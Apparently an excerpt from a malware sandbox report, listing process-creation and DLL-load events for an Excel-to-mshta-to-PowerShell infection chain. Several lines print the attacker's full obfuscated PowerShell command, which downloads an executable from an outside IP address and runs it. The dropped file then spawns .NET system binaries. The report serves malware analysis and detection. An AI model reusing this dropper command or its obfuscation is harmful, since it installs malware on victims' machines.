            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC41B.tmp" "c:\Users\user\AppData\Local\Temp\ofvwqfjd\CSC42CCF8E8871B428699CAD148D9BC26FF.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
            Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9F.tmp" "c:\Users\user\AppData\Local\Temp\ge3s1wmx\CSCB36078EA61014130AC1261969F8319D.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
            Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
            Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe" Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC41B.tmp" "c:\Users\user\AppData\Local\Temp\ofvwqfjd\CSC42CCF8E8871B428699CAD148D9BC26FF.TMP"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9F.tmp" "c:\Users\user\AppData\Local\Temp\ge3s1wmx\CSCB36078EA61014130AC1261969F8319D.TMP"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: ucrtbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\winiti.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: shcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
